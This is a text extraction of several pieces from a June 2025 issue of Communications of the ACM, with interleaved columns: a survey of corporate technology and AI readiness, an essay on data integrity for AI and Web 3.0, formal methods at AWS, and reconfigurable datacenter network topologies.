But the data suggests many com- an extraordinary—and dangerous— security funding an effort to dodge
panies still view technology as a busi- “wait-and-see” mind-set. The data also what “might go wrong” or assuring
ness tool rather than an enabler of suggests only 29% describe themselves “what must go right”?
competitive advantage. Particularly as innovators or early technology Strategy. Why do companies in-
surprising were results observed in adopters. This tracks with the lack of vest in technology? What competi-
technology adoption and awareness, defined innovation processes and the tive advantage are they seeking? The
cybersecurity, innovation, and board inability to be technologically agile. responses here were equally surpris-
readiness, where we observed tech- The data suggests the vast major- ing, and suggest some digital era
nology awareness and commitments ity (70%) of companies see technology challenges. As business moves to-
were much more tepid than antici- solutions as requirements-driven not ward “all-digital” status—that is, 24/7
pated, especially in the age of AI. Most technology-driven (12%). Inexplicably, technology-enabled business process-
companies are struggling to articulate 14% answered “neither” or “not sure.” es—only 19% of companies see their
AI plans, as responses do not describe While a requirements-first approach business and technology strategies
AI as a strategic differentiator or an to technology investment sounds as intertwined. Thirty-five percent be-
investment priority. Similarly, compa- prudent, it’s important to remember lieve they are “very different” and 46%
nies do not see innovation as a priori- that many technology solutions are see business and technology strate-
ty, despite how many companies claim “discovered” by prototyping and the gies as somewhat related.
to be innovation leaders. encouragement of so-called “science Motivations. Motivations vary too.
None of this suggests companies projects” where technologies—espe- While “digital transformation” still
have learned enough lessons from past cially such as AI—are “product tested” has conceptual appeal, cost reduction
experiences. Despite problems with before they are assigned for duty. The topped the list of motivators. Others
the optimization of technology, sur- insistence on old approaches to mod- cited “fear of competition” and “C-
vey results suggest the learning curve ern technology spending is risk mul- suite pressure.” Revenue generation—
is fairly flat. Companies frequently tiplying. The data reflect antiquated while always important—is the first
say that “technology” is an important attitudes and practices that limit com- priority.
part of their strategy and tactics. Ap- Innovation. One of the most
proximately 75% of them also say that surprising findings is that over 55%
technology is “essential to their com- Like so many of us of companies do not actively track
petitiveness over the next 5–7 years.” emerging technologies or maintain
But when asked about “readiness” to in the business world, technology watch lists. Only 36% claim
leverage emerging technologies over we are accustomed that they do, which is surprisingly low
the same period, over 75% answered in the age of digital transformation.
“moderate” or “low.” to failure. Massive innovation readiness gaps fol-
Organizational analysis. Respon- low. Only 17% of companies have a well-
dents also revealed some organiza- funded, well-defined innovation strategy.
tional structure and IT oversight mis- Forty-nine percent have a “partial” in-
matches. Over 65% of respondents novation strategy, and 34% have no
innovation strategy at all. This finding as well as their strategic demeanor and
defines the essence of risk, since new, ambition. Technology-savvy board
digital era business models and pro- Most companies directors should be recruited and re-
cesses are almost always technology are struggling to tained. The board should also have a
driven. technology committee separate from
articulate AI plans, audit and compliance oversight.
The Strange Case of AI as responses do ˲ AI, machine learning and GenAI
A 2024 McKinsey survey describes should immediately rise to the top of
GenAI as a major driver of strategic not describe AI the emerging/ disruptive technology
competitiveness, yet the executives as a strategic list. Credible talent should be devel-
we surveyed do not see AI as a strate- oped or hired.
gic differentiator.6 This was especially differentiator or an ˲ Distinctions between business
surprising given all of the publicity investment priority. and technology strategy are nearly
and prototyping related to AI, machine obsolete, since all companies to some
learning and GenAI. But despite all degree are now technology compa-
this publicity, only 20% of companies nies. Technology and business are
defined AI initiatives as high priority, intertwined today more than ever be-
and more than 47% defined them as fore, with growth needs only reason-
insufficient or “unknown.” Consistent enable accountability, opportuni- ably expected.
with this finding, only 25% adequately ties for technology-enabled solutions ˲ The overall business-technology
fund their AI initiatives and 37% be- should be widened across lines of relationship should be assessed by a
lieve they do “sometimes”; 37% report business where decentralized technol- team comprised of chief strategy of-
their AI initiatives are not adequately ogy teams act on their own to develop ficers and chief technology officers
funded or they just do not know. How technology strategies for their own where it is impossible for an observer
was this even possible circa 2024? markets. to know who is who.
When asked about where their AI ˲ Enterprises and lines of business
initiatives appeared on the technol- should invest in technology tracking, Conclusion
ogy adoption curve, 32% of companies testing and adoption. They should The data we collected yielded some
described themselves as “innovators” avoid becoming “late adopters” of surprising results about how technol-
and “early adopters,” which contra- emerging and disruptive technology, ogy is organized, tracked, secured,
dicts some other findings. Approxi- which is the blueprint for competitive innovated, adopted, governed, and
mately 53% describe themselves as unpreparedness. integrated into business strategy. The
“late majority,” “laggards,” or com- ˲ Requirements-first/technolog y results revealed that despite all of the
pletely “unprepared” for AI. When second is a conservative adoption excitement about AI, machine learn-
asked specifically about GenAI—Chat- strategy that defined technology ap- ing, and GenAI, adoption even here is
GPT, Gemini, and so forth—23% said plications development in the 20th slow. Our survey suggests that no mat-
they have explored the potential and century. While the approach still ter what the industry, who the leader-
risks of generative AI, but 77% said holds for some well-bounded re- ship is, or the size of the company, the
that had only looked at GenAI briefly quirements—such as ERP and CRM business-technology relationship still
or not at all. Given all of the interest— requirements—most requirements has a long way to go.
and opportunity—in AI, these find- are dynamic and cannot be easily
ings—in 2023–2024—are stunning. “matched” with technology solutions. References
1. Carlton, R. Ten ERP failure statistics that highlight the
Technology exploration should often importance of getting it right the first time round. EPR
Recommendations replace requirements-first technology Focus. (Aug. 2019).
2. Fruhlinger, J., Wailgum, T., and Sayer, P. 16 famous
The lack of technology ROI, inade- investments. ERP disasters, dustups and disappointments. CIO
quate technology tracking, poor inno- ˲ Emerging and disruptive technol- Magazine. (Mar. 2020).
3. Guerthoff, A. Why 70% of all CRM projects fail.
vation funding, disengaged boards of ogy should be tracked and assessed Linkedin. (May 2020).
4. Peppard, J. Why do companies’ IT projects fail so
directors, a casual view of AI, stubborn on a continuing basis. Internal teams often?” Wall Street J. (Sept. 2023).
requirements-driven technology proj- should be assigned to this task. Tech- 5. Pratt, M. Why IT projects still fail. CIO Magazine (Oct.
2023).
ects, and the separation of business nologies should be assessed for their 6. Singla, A. et al. The State of AI in Early 2024: Gen
and technology strategies all define problem-solving potential, cost, risks AI Adoption Spikes and Starts to Generate Value.
McKinsey (May 2024).
the need to modernize the business- and impact—and reviewed at least
technology relationship and the entire quarterly. Stephen J. Andriole ([email protected]) is
technology investment strategy. ˲ Innovation methods, tools, tech- Thomas G. Labrecque Professor of Business Technology
Department of Accounting and Information Systems at
In response to the survey data, niques, talent and funding should be Villanova University, Villanova, PA, USA.
here are some steps companies might defined and acquired. There is no such Noah P. Barsky ([email protected]) is an
consider: thing as a “partial” innovation strat- associate professor in the Department of Accounting and
˲ Companies should revisit their Information Systems at Villanova University, Villanova,
egy. PA, USA.
technology reporting structures. ˲ Board directors should be recruit-
While “control” can reduce risk and ed for their knowledge and experience © 2025 Copyright held by the owner/author(s).
JU N E 2 0 2 5 | VO L. 6 8 | N O. 6 | C OM M U N IC AT ION S OF T HE ACM 33
O
opinion
Opinion
Web 3.0 Requires
Data Integrity
New integrity-focused standards are necessary to enable
the trusted AI services of tomorrow.
I
taken a comput-
F YO U ’ V E E V E R
er security class, you’ve prob-
ably learned about the three
legs of computer security—
confidentiality, integrity, and
availability—known as the CIA triad.a
When we talk about a system being
secure, that’s what we’re referring to.
All are important, but to different de-
grees in different contexts. In a world
populated by artificial intelligence
(AI) systems and artificial intelligent
agents, integrity will be paramount.
What is data integrity? It’s ensuring
that no one can modify data—that’s
the security angle—but it’s much more
than that. It encompasses accuracy,
completeness, and quality of data—all
over both time and space. It’s prevent-
ing accidental data loss; the “undo”
button is a primitive integrity mea-
sure. It’s also making sure that data
is accurate when it’s collected—that it
comes from a trustworthy source, that nizations worldwide established their e-commerce, social media, and online
nothing important is missing, and digital presence, leading to massive everything demanded both data pro-
that it doesn’t change as it moves from digitization projects where quantity tection and user privacy. Confidential-
format to format. The ability to restart took precedence over quality. The em- ity became paramount.
your computer is another integrity phasis on making information avail- We stand at the threshold of a new
measure. able overshadowed other concerns. Web paradigm: Web 3.0. This is a dis-
The CIA triad has evolved with As Web technologies matured, the tributed, decentralized, intelligent
IMAGE BY ALEXA ND ER56 891 /SHUT TERSTOCK.COM
the Internet. The first iteration of the focus shifted to protecting the vast Web. Peer-to-peer social-networking
Web—Web 1.0 of the 1990s and early amounts of data flowing through on- systems promise to break the tech
2000s—prioritized availability. This line systems. This is Web 2.0: the In- monopolies’ control on how we inter-
era saw organizations and individuals ternet of today. Interactive features act with each other. Tim Berners-Lee’s
rush to digitize their content, creating and user-generated content trans- open W3C protocol, Solid, represents
what has become an unprecedented formed the Web from a read-only me- a fundamental shift in how we think
repository of human knowledge. Orga- dium to a participatory platform. The about data ownership and control. A
increase in personal data, and the future filled with AI agents requires
a https://tinyurl.com/248uyhq6 emergence of interactive platforms for verifiable, trustworthy personal data
and computation. In this world, data building and deploying digital sys-
integrity takes center stage. tems that impact human lives and so-
For example, the 5G communica- AI systems need cietal outcomes.
tions revolution isn’t just about faster clean, consistent, At the foundation level, bits are
access to videos; it’s about Internet- stored in computer hardware. This
connected things talking to other In- and verifiable control represents the most basic encoding of
ternet-connected things without our processes to learn our data, model weights, and compu-
intervention. Without data integrity, tational instructions. The next layer
for example, there’s no real-time car- and make decisions up is the file system architecture: the
to-car communications about road effectively. way those binary sequences are orga-
movements and conditions. There’s nized into structured files and direc-
no drone swarm coordination, smart tories that a computer can efficiently
power grid, or reliable mesh network- access and process. In AI systems, this
ing. And there’s no way to securely em- includes how we store and organize
power AI agents. training data, model checkpoints, and
In particular, AI systems require ro- development begins. At the model hyperparameter configurations.
bust integrity controls because of how level, mathematical foundations and On top of that are the application
they process data. This means techni- training processes can introduce new layers—the programs and frame-
cal controls to ensure data is accurate, integrity issues even with clean data. works, such as PyTorch and Tensor-
that its meaning is preserved as it is During execution, environmental Flow, that allow us to train models,
processed, that it produces reliable changes and runtime modifications process data, and generate outputs.
results, and that humans can reliably can corrupt previously valid models. This layer handles the complex math-
alter it when it’s wrong. Just as a scien- And at the output level, the challenge ematics of neural networks, gradient
tific instrument must be calibrated to of verifying AI-generated content and descent, and other ML operations.
measure reality accurately, AI systems tracking it through system chains cre- Finally, at the user-interface level,
need integrity controls that preserve ates new integrity concerns. Each level we have visualization and interaction
the connection between their data compounds the challenges of the ones systems—what humans actually see
and ground truth. before it, ultimately manifesting in and engage with. For AI systems, this
This goes beyond preventing data human costs, such as reinforced bi- could be everything from confidence
tampering. It means building systems ases and diminished agency. scores and prediction probabilities to
that maintain verifiable chains of trust Think of it like protecting a house. generated text and images or autono-
between their inputs, processing, and You don’t just lock a door; you also mous robot movements.
outputs, so humans can understand use safe concrete foundations, sturdy Why does this layered perspective
and validate what the AI is doing. AI framing, a durable roof, secure dou- matter? Vulnerabilities and integrity
systems need clean, consistent, and ble-pane windows, and maybe motion- issues can manifest at any level, so un-
verifiable control processes to learn sensor cameras. Similarly, we need derstanding these layers helps securi-
and make decisions effectively. With- digital security at every layer to ensure ty experts and AI researchers perform
out this foundation of verifiable truth, the whole system can be trusted. comprehensive threat modeling. This
AI systems risk becoming a series of This layered approach to under- enables the implementation of de-
opaque boxes. standing security becomes increas- fense-in-depth strategies—from cryp-
Recent history provides many so- ingly critical as AI systems grow in tographic verification of training data
bering examples of integrity failures complexity and autonomy, particular- to robust model architectures to inter-
that naturally undermine public trust ly with large language models (LLMs) pretable outputs. This multi-layered
in AI systems. Machine-learning (ML) and deep-learning systems making security approach becomes especially
models trained without thought on high-stakes decisions. We need to crucial as AI systems take on more au-
expansive datasets have produced verify the integrity of each layer when tonomous decision-making roles in
predictably biased results in hiring critical domains such as healthcare,
systems. Autonomous vehicles with finance, and public safety. We must
incorrect data have made incorrect— A lack of integrity ensure integrity and reliability at every
and fatal—decisions. Medical diag- level of the stack.
nosis systems have given flawed rec- controls undermines The risks of deploying AI without
ommendations without being able to AI systems and proper integrity control measures are
explain themselves. A lack of integrity severe and often underappreciated.
controls undermines AI systems and harms people who When AI systems operate without suf-
harms people who depend on them. depend on them. ficient security measures to handle
They also highlight how AI integ- corrupted or manipulated data, they
rity failures can manifest at multiple can produce subtly flawed outputs
levels of system operation. At the that appear valid on the surface. The
training level, data may be subtly cor- failures can cascade through inter-
rupted or biased even before model connected systems, amplifying errors
JU N E 2 0 2 5 | VO L. 6 8 | N O. 6 | C OM M U N IC AT ION S OF T HE ACM 35
opinion
https://src.acm.org
b https://tinyurl.com/2adqpbta ethics, and governance. Ottenheimer has been leading
c https://tinyurl.com/25lk298r large-scale enterprise security innovations and operations
across multiple industries for more than 30 years.
d https://tinyurl.com/y5ut5tng
e https://tinyurl.com/y58xg4bc
f https://tinyurl.com/y3hxrkol © 2025 Copyright held by the owner/author(s).
q Join ACM-W: ACM-W supports, celebrates, and advocates internationally for the full engagement of women
in computing. Membership in ACM-W is open to all ACM members and is free of charge.
PAYMENT INFORMATION
Name
Purposes of ACM
ACM is dedicated to:
Mailing Address 1) Advancing the art, science, engineering, and application
of information technology
2) Fostering the open interchange of information to serve
both professionals and the public
City/State/Province
3) Promoting the highest professional and ethics standards
ZIP/Postal Code/Country
By joining ACM, I agree to abide by ACM’s Code of Ethics
q Please do not release my postal address to third parties (www.acm.org/code-of-ethics) and ACM’s Policy Against
Harassment (www.acm.org/about-acm/policy-against-
harassment).
Email Address
I acknowledge ACM’s Policy Against Harassment and
q Yes, please send me ACM Announcements via email agree that behavior such as the following will constitute
q No, please do not send me ACM Announcements via email grounds for actions against me:
Systems
bugs that would have eluded tradi-
tional approaches such as testing.
Second, we gained the deep under-
standing and confidence needed to
implement aggressive performance
Correctness
optimizations while maintaining sys-
tems correctness.
Moreover, 15 years ago, AWS’s soft-
ware testing practice relied primar-
Practices at
ily on build-time unit testing, often
against mocks, and limited deploy-
ment-time integration testing. Since
then, we have significantly evolved
our correctness practices, integrat-
Amazon Web
ing both formal and semi-formal
approaches into the development
process. As AWS has grown, formal
methods have become increasingly
valuable—not only for ensuring cor-
Services
rectness but also for performance
improvements, particularly in verify-
ing the correctness of both low- and
high-level optimizations. This system-
atic approach toward systems correct-
ness has become a force multiplier at
AWS’s scale, enabling faster develop-
ment cycles through improved devel-
oper velocity while delivering more
cost-effective services to customers.
This article surveys the portfolio
of formal methods used across AWS
(AWS) strives to deliver reliable
A M A Z ON W EB SERV ICE S to deliver complex services with high
confidence in their correctness. We
services that customers can trust completely. This consider an umbrella definition of for-
requires maintaining the highest standards of security, mal methods that encompasses these
rigorous techniques—from traditional
durability, integrity, and availability—with systems formal approaches (such as theorem
correctness serving as the cornerstone for achieving proving,7,10 deductive verification,18
these priorities. An April 2015 article published in and model checking8,14) to more light-
weight semi-formal approaches (such
Communications, titled “How Amazon Web Services as property-based testing,6,19 fuzzing,9
Uses Formal Methods,” highlighted the approach and runtime monitoring11).
for ensuring the correctness of critical services that The P Programming Language
have since become among the most widely used by As the use of formal methods was ex-
AWS customers.21 panded beyond the initial teams at
AWS in the early 2010s, we discovered
Central to this approach was TLA+,14 a formal that many engineers struggled to learn
specification language developed by Leslie Lamport. and become productive with TLA+.
get right at S3 scale, and the team want- for the implementation makes the in- hardware and other system failures are
ed to deliver strong consistency with vestment in formal specification much simulated during testing), and mini-
high confidence in correctness, they more valuable and addresses classic mization (where counterexamples are
used P to formally model and validate concerns with the deployment of for- automatically reduced to aid human-
the protocol design. P helped elimi- mal methods in practice (that is, con- guided debugging).
nate several design-level bugs early in necting design-time validation with Deterministic simulation. Another
the development process and allowed system implementation). lightweight method widely used at
JU N E 2 0 2 5 | VO L. 6 8 | N O. 6 | C OM M U N IC AT ION S OF T HE ACM 39
practice
systems. For example, it can be trig- to prove that the implementation sat-
gered in most systems with timeout- isfies a variety of security properties.
and-retry client logic. This type of proof goes beyond testing.
Traditional formal approaches to It is a proof in the mathematical sense.
modeling distributed systems typi- The team also applied a differential
cally focus on safety (nothing bad hap- testing approach using the Dafny code
pens) and liveness (something good as a correctness oracle to verify the
eventually happens), but metastable correctness of the production-ready
failures remind us that systems have Rust implementation. Publishing
a variety of behaviors that cannot be the Dafny code and test procedures
neatly categorized this way. We have as open source, along with the Cedar
increasingly turned to discrete-event implementation, allows Cedar users to
simulation to understand the emer- check the team’s work on correctness.
gent behavior of systems, investing Another example is the Firecracker
both in custom-built systems simula- virtual machine monitor (VMM). Fire-
tions and tooling that allow the use of cracker uses a low-level protocol called
existing system models (built in lan- virtio to expose emulated hardware de-
guages such as TLA+ and P) to simu- vices (such as a network card or solid- an opportunity to reduce the cost of
late system behavior. Extending ex- state drive) to guest kernels running distributed commits from 2 to 1.5 net-
haustive model checkers, like TLA+’s inside the VM. This emulated device work roundtrips without sacrificing
TLC with probabilistic simulations, is a critical security boundary because any safety properties. These kinds of
also allows for the generation of statis- it is the most complex interaction be- stories are usual for teams that adopt
tical results such as posterior latency tween the untrusted guest and trusted formal methods, driven by at least two
distributions, making model checking host. The Firecracker team used a tool different dynamics.
useful for tasks such as understanding called Kani20 that can reason formally First, the act of deeply thinking
the achievability of latency service-level about Rust code to prove key proper- about and formally writing down dis-
agreements (SLAs). ties of this security boundary. Again, tributed protocols forces a structured
proof here goes beyond testing and en- way of thinking that leads to deeper
sures that the critical properties of this insights about the structure of proto-
boundary are held no matter what the cols and the problem to be solved. Sec-
guest attempts to do. ond, having the ability to formally
Proofs around the behaviors of pro- check (and, in some cases, prove) that
grams are an important part of AWS’s proposed design optimizations are
software correctness program, so we correct allows naturally conservative
support development on tools such distributed-systems engineers to be
as Kani, Dafny,18 and Lean,16 and the bolder in their protocol design choices
underlying tools—such as satisfiabil- without increasing risk and boosting
ity modulo theory (SMT) solvers—that the developer velocity toward deliver-
power them. ing reliable services.
The ability to use formal models and These productivity and cost ben-
specifications—for model-checking efits are limited not only to high-level
Formal Proof systems at design time, for validating design optimizations but also to low-
In some cases, the formal methods in-production behavior using runtime level code that normally gets ignored.
enumerated so far in this article are monitoring by serving as a correct- In one example, the AWS team identi-
not sufficient. For critical security ness oracle, for simulating emergent fied optimizations to the implemen-
boundaries such as authorization and systems behavior, and for building tation of the Rivest-Shamir-Adleman
virtualization, for example, proofs of proofs of critical properties—allows (RSA) public-key encryption scheme on
correctness can be both desirable and AWS to amortize the engineering ef- our ARM-based Graviton 2 processor,
worth the significant investment need- fort of developing these specifications which could improve throughput by up
ed to create them. over a larger amount of business and to 94%.17
In 2023, AWS introduced the Cedar customer value. Using the HOL Light interactive
authorization policy language for writ- theorem prover, the team was able to
ing policies that specify fine-grained Benefits Beyond Correctness prove the correctness of these optimi-
permissions. Cedar was designed Finally, as discussed in the aforemen- zations. Given the high percentage of
for automated reasoning and formal tioned 2015 paper, formal methods cloud CPU cycles spent on cryptogra-
proof.12,24 The language was designed are a crucial part of safely improving phy, this type of optimization can sig-
to be well-suited for proof, and the the performance of cloud systems. nificantly reduce infrastructure costs
implementation was built in the veri- Modeling a key commit protocol for and aid sustainability while at the
fication-aware programming language the Aurora relational database engine same time improving customer-visible
Dafny. Using Dafny, the team was able in P and TLA+ allowed us to identify performance.
JU N E 2 0 2 5 | VO L. 6 8 | N O. 6 | C OM M U N IC AT ION S OF T HE ACM 41
practice
Divyakant Agrawal
UC Santa Barbara, USA
Revolutionizing
throughput of datacenter networks,
and leading companies such as Google,
Microsoft, and Meta are competing to
improve the operations of their net-
works.8,29,32
Datacenter
State-of-the-art datacenter network
topologies have two common features:
They are fixed and oblivious to the traf-
fic demands they serve. In particular,
Networks via
current datacenter topologies are op-
timized for uniform, “all-to-all” traf-
fic. This stands in stark contrast to the
actual traffic patterns in datacenters,
Reconfigurable
which often feature distinct spatial and
temporal structures—that is, they are
skewed and bursty.18,29 Thus, to further
improve datacenter performance, a
particularly intriguing and novel ap-
Topologies
proach is to leverage a new degree of
freedom related to the physical network
topology.
Emerging optical technologies en-
able reconfigurable datacenter net-
works (RDCNs): networks whose to-
pologies can dynamically change to
key insights
˽ Datacenter networks have become a
critical infrastructure for our digital
DATACEN T ER N ET WOR K S H AV Ebecome critical society, serving explosively growing
communication traffic.
infrastructure for our digital society. Indeed, the ˽ Reconfigurable datacenter networks
performance of many distributed systems and (RDCNs), which can adapt their topology
dynamically, based on innovative
cloud applications—for example, those related to optical switching technologies, have the
potential to improve datacenter network
distributed machine learning (ML), batch processing, performance and to simplify datacenter
scale-out databases, or streaming—critically depends planning and operations.
˽ Demand-aware dynamic topologies
on the throughput capacity of the underlying are particularly interesting because
IMAGE BY PETERSC HREIBER.M EDIA
accommodate, or even adapt to and clude by discussing challenges ahead, fic is often destined for only a few tens
exploit, the structures in their com- also based on interviews with experts. of racks.
munication traffic in a self-adjusting As a small-scale example, consider
manner. Therefore, RDCNs introduce Empirical Motivation: Structure Figure 1a, which shows a GPU-to-GPU
resource-allocation flexibility in the In Application’s Traffic trace that was generated by a neural
physical layer. This is also known as to- network training job. This trace fea-
Think about a machine learning
pology engineering: the ability to control tures both temporal and spatial local-
training job, say, training a Chat
the dynamic network topology. More ity (structure). The trace histogram—
GPT model. It takes months to train
specifically, these dynamic datacenter more specifically, its demand matrix
this model, but the traffic matrix is
topologies do not require any rewiring, (top)—is skewed, exhibiting a spatial
beautifully predictable and periodic,
but rather are enabled by optical circuit structure. Moreover, compared to a
which makes it very suitable to think
switches (OCSs) and similar technolo- uniform trace (bottom), the traffic is
about whether or not we could adjust
gies. Depending on the specific tech- bursty in the time dimension, featur-
the topology according to the traffic.
nology used, the topological intercon- ing a temporal structure.
— Manya Gobhadi (MIT)
nects between racks can be changed The specific degree of traffic locality
within milliseconds, microseconds, or, Datacenter traffic is growing explo- depends on the application.4,29 A new
recently, even nanoseconds. sively in volume.28 Moreover, it features methodology, called a complexity map,
There is still, however, no consensus distinct structures: Packet traces from provides an intuitive visualization of
in the community on which RDCN de- real-world applications are far from ar- the strengths of the temporal and non-
sign is optimal. In particular, though bitrary or random. Measurement stud- temporal structures in the traffic of dif-
static network topologies are currently ies18,29 have revealed that the traffic ferent distributed applications.4 The
well understood and fat-tree topolo- patterns in datacenters feature consid- complexity map measures the amounts
gies2 have emerged as the de facto to- erable locality, in both space and time: of entropy in a trace along the space
pologies for datacenters, we still lack They are skewed and bursty4 and com- and time dimensions and compares
fundamental models and metrics for munication clusters are relatively stable them to those of a completely unstruc-
rigorously studying and comparing dif- over time.12,29 Kandula et al.18 showed tured (uniform) trace. Figure 1b shows a
ferent RDCN designs. In this article, we that much of the traffic volume in pro- complexity map for seven different real-
provide an overview of RDCNs. We first duction Microsoft datacenters could world traces:29 three different Facebook
review the motivation for RDCNs and be explained by simple patterns. Face- datacenter traces, related to Web (WEB),
discuss their technological enablers. book (now Meta)29 reported that in their database (DB), and Hadoop (HAD) ap-
We then present a taxonomy of the datacenters, many flows are long-lived, plications; two high-performance
RDCN design space and propose a for- and though hosts (servers) often com- computing benchmarks (CNS and Mul-
mal model to raise interest in the topic municate with hundreds of hosts and tiGrid); a machine learning job (ML);
in the research community. We con- racks concurrently, the majority of traf- and a popular synthetic trace, pFabric
Figure 1. (a) Visualization of the spatial and temporal structures of a simple packet trace (middle) from a machine learning application,
a popular convolutional neural network training job, on four GPUs. (top) The demand matrix. (bottom) An i.i.d trace with the same distri-
bution. (b) A complexity map of seven real traces (colored circles) and four reference points placed at the corners of the map.
spatial structure
1.0 Bursty Uniform
0.9
pFab
Non-temporal complexity
ML
U
0.8 CNS
GP
ion
Sou DB
rce
at
GPU 0.7
in
st
De
WEB
Time 0.6 Skewed Multi
Entries in the trace are shown in the order of appearance. Grid HAD
&Bursty
0.5
0.4 Skewed
Temporal structure in the original trace
0.3
0.3 0.4 0.5 0.6 0.7 0.8 0.9 1.0
No temporal structure sampled i.i.d Temporal complexity
(pFab). For reference, it also shows a Figure 2. Examples of state-of-the-art static datacenter network topologies with eight
purely uniform traffic pattern, which racks, each containing two hosts. (a) A fat-tree, bi-regular topology with two types of
is mapped to the upper right; a pattern switches, top-of-rack (ToR) switches (in blue) connecting to the hosts, and additional
that features only a temporal structure switches (in green) to increase throughout. (b) An expander-based, uni-regular topology,
with only ToR switches. In both topologies, the diameter is four.
but no spatial structure, on the upper
left; and a pattern that features only a
spatial structure, on the lower right. We
can see that the seven real-world traces
indeed have different amounts of struc-
ture, and none of these traffic patterns
is uniform.
The expanding variety of cloud ap- (a) Fat-tree topology – bi-regular (b) Expander topology – uni-regular
plications not only creates additional
traffic patterns that come in many dif-
ferent flavors, but also introduces dif- network via a top-of-rack (ToR) switch. ters provide the desired non-blocking
ferent performance requirements. For Traditional datacenter networks architecture, this comes at the cost of
instance, batch processing applications are built from electrical switches con- requiring additional switches that are
such as Hadoop exhibit an all-to-all nected by high-speed optical fibers. not connected to the hosts. Figure 2a
traffic pattern that requires very high Most deployed datacenter networks rely shows an example of a non-blocking,
throughput; short query traffic has a on fat-tree topologies, which are based three-layer, fat-tree topology that con-
skewed pattern and requires very low la- on Clos networks,2 and come in dif- nects eight racks, where the two types
tency; and all-reduce operations in ML ferent flavors.2,29,32 In contrast to other of switches (each of radix four) are col-
applications exhibit a ring or tree-like communication networks, datacen- ored in blue and green.
traffic pattern, with a small number of ter networks typically operate under a Aiming to provide full bisection
elephant flows whose completion times single administrative domain, which bandwidth at lower cost, another recent
critically affect the overall application facilitates simpler control using, for class of datacenter networks is based on
performance.36 Traffic patterns can example, software-defined networking uni-regular topologies,27 which can have
also change over time; for example, one (SDN). Such a single domain can in- lower installation and management
training iteration typically contains for- clude a unified controller and network overheads. Here, every switch connects
ward, backward, and all-reduce phases, operating system (NOS), and allows for to a fixed number of hosts. These net-
resulting in periodic (and fairly predict- fast and fine-grained adaptation of the works also come in different flavors
able) demand.37 network layer. and their topologies are often based on
The main takeaway is that while Existing datacenters typically aim to expander graphs.34 Figure 2b shows an
datacenter communication traffic achieve a throughput metric called full example of an expander-based, uni-reg-
comes in different flavors, each still fea- bisection bandwidth, which essentially ular topology that connects eight racks
tures some structure and therefore has means non-blocking traffic forwarding. using only ToR switches (of radix 4).
low complexity. This structure, in turn, The bisection bandwidth refers to the Alternative throughput metrics have
provides opportunities for researchers smallest aggregate capacity of the links also been presented in the literature on
to optimize the network topology ac- crossing the worst-case cut among all datacenter networks. The throughput
cordingly. possible cuts that divide the topology under a given saturateda traffic matrix
graph into two halves. A network has T can be defined as the largest scal-
Traditional Datacenter full bisection bandwidth if its bisection ing factor θ(T) such that the topology
Network Topology Design bandwidth is equal to half of the total can support the traffic matrix, with-
The most essential property of tradi- host traffic; topologies like fat-tree- out violating any link’s capacity con-
tional datacenter networks is that they based networks permit arbitrary appli- straint. The worst-case throughput of
use static wired topologies. As data- cation instance placement. To achieve a topology among all traffic matrices is
center traffic patterns evolve over time, this, fat-tree datacenter networks are denoted by θ∗. A topology can support
these static topologies are designed to typically based on a non-blocking mul- any traffic demand if and only if θ∗ is at
work well for any communication in- tistage switching topology built out of least 1 (in this case, we say that the to-
put; thus, they are oblivious to the real smaller radix switch chips. In the re- pology has full throughput). Because it
traffic, in the sense that they are opti- sulting hierarchical designs, referred to can support any traffic demand, a full-
mized only for the worst-case scenario. as bi-regular topologies,27 there are two throughput topology also permits arbi-
Accordingly, common datacenter net- types of switches: switches that connect trary application instance placement
work topologies are regular and sym- to hosts (and from which traffic thus en- by definition. In a systematic compari-
metric, with many redundant short ters the network) and switches that con- son of the bisection bandwidth and
paths to support high capacity and nect only to other switches (which there- throughput metrics, it was recently
availability. Hosts (or other compute in- fore merely forward traffic). Adding
frastructures, such as GPUs) in datacen- more switches of the former type can a The sum of the rates in each row and column
ters are usually mounted in racks, each help increase the throughput between of the demand matrix matches the switch
of which is connected to the datacenter hosts. While such bi-regular datacen- capacities.
JU N E 2 0 2 5 | VO L. 6 8 | N O. 6 | C OM M U N IC AT ION S OF T HE ACM 47
research and advances
found that depending on which met- a spine layer with uniform support for set of physical connections (circuits)
ric is used, different conclusions may the fastest devices that might connect between racks via suitably configured
result, affecting cost and management to it. As hosts and storage devices are matching between its ports. Figure 3a
complexity.27 In general, it is believed continuously evolving, without support shows an example of such a setup with
that throughput metrics better capture for heterogeneous speeds, incremental eight ToRs and two optical switches,
the capacity of both uni-regular and bi- deployments are expensive. Clearly, re- each with a matching configuration
regular topologies. placing the entire spine layer to support between its ports that creates optical
Traditional datacenter network de- a faster speed would be impractical, circuits between two ToRs.
signs (whether bi-regular or uni-regular) involving hundreds of individual racks The revolutionary idea underly-
all share the properties of being fixed and thousands of fibers. ing RDCN design is that each switch’s
and oblivious to the real demand. This matching (that is, circuits) can be dy-
can come at a cost. In particular, static Paradigm Shift: Reconfigurable namically reconfigured by remapping
topologies inherently require multi- Topologies and Their Enabling the input ports to different output ports.
hop forwarding, which can introduce Optical Technologies In turn, this reconfiguration changes
inefficiencies, especially for large flows: the physical network topology. Various
It’s really more recently that we’re
The more hops a flow must traverse, the technologies enable this matching re-
performing real-time, what
more network capacity is consumed. In configuration in optical switches. For
I call “topology engineering,” to
the literature, this overhead has been example, a topology can be reconfig-
match communication patterns.
termed bandwidth tax,23 referring to the ured using OCSs based on micro-elec-
— Amin Vahdat (Google)
additional bytes that need to be sent tromechanical systems (MEMSs).28 In
along multiple hops (due to multi-hop With the maturation of optical switch- a MEMS-based OCS, the optical signals
routing) compared with direct, single- ing technologies, RDCNs have emerged are forwarded via mirrors, which can be
hop routing. In current fat-tree-based as an innovative and attractive alter- actuated and tilted to steer each signal
datacenter designs, due to the radix native to traditional static-topology to the desired port (Figure 3b top). In
limitation of switches, the network di- datacenter network designs. These an alternative technology, each source
ameter is usually six or eight hops. Re- datacenter networks based on dynamic ToR switch can change the frequency
cently, it was shown that the expected topologies represent a paradigm shift, (wavelength, color) at which its signal
route length (that is, bandwidth tax) and standing in stark contrast to the fixed is transmitted, and passive gratings
the throughput are inversely related in nature of state-of-the-art datacenter are used in the OCS to direct every en-
